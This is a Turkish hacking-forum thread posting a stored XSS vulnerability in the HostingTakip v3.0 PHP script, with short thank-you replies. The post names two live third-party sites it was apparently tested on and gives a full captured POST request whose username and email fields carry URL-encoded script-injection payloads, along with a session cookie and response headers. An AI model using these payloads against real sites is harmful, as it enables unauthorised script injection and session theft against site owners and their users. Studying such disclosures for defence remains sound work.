Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
HostingTakip v3.0 - Stored XSS Vulnerability
#1
www.deccal.org

Web App: HostingTakip
Affected Version : v3.0
Software: http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hosti...ripti.html
Official Demo: http://hostingtakip.teknoder.com/demo/
RISK: Medium
Tested On: [L] Windows 7, Mozilla Firefox
####################INFO################################
XSS payload is possible to run in your registration form.
click on "Yeni Müşteri" Here the e-mail section appears unprotected been no filtering
Any payload code to enter "uye-duzenle.php" on will be permanent and will work
########################################################
Tested on;
http://www.ayashosting.com
http://www.oneritasarim.com/hostingtakip/
----------------------------------------------------------
Request
----------------------------------------------------------
POST http://www.oneritasarim.com/hostingtakip...amamla.php
Request Headers:
Host[www.oneritasarim.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php]
Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)]
Connection[keep-alive]

Post Data:
Kod:
kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
      posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
      sifre[123456]
      ad[123456]
      tc[012345678901]
      tel[12345678901]
      mustip[b]
      sehir[h4]
      ilce[h4]
      adres[h4x0resec.blogspot.com]
      hakkimda[h4]
      guv[1b4b47]
      B1[G%F6nder]
Response Headers:
Kod:
Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Date[Fri, 13 Mar 2015 12:18:10 GMT]
      Server[LiteSpeed]
      Connection[close]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Content-Type[text/html]
      Content-Length[143]
Beğenenler:
#2
Eline sağlık dostum exciting
www.deccal.org


Beğenenler:
#3
eline sağlık abi
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Nic El Salvador LFI SQL Vulnerability S4DRAZAM 5 142 25-08-2016, Saat: 13:24
Son Yorum: viottox0
Anahtar Kelimeler

HostingTakip v3.0 - Stored XSS Vulnerability indir, HostingTakip v3.0 - Stored XSS Vulnerability Videosu, HostingTakip v3.0 - Stored XSS Vulnerability Online izle, HostingTakip v3.0 - Stored XSS Vulnerability Bedava indir, HostingTakip v3.0 - Stored XSS Vulnerability Yükle, HostingTakip v3.0 - Stored XSS Vulnerability Hakkında, HostingTakip v3.0 - Stored XSS Vulnerability Nedir, HostingTakip v3.0 - Stored XSS Vulnerability Free indir, HostingTakip v3.0 - Stored XSS Vulnerability Oyunu, HostingTakip v3.0 - Stored XSS Vulnerability Download


1 Ziyaretçi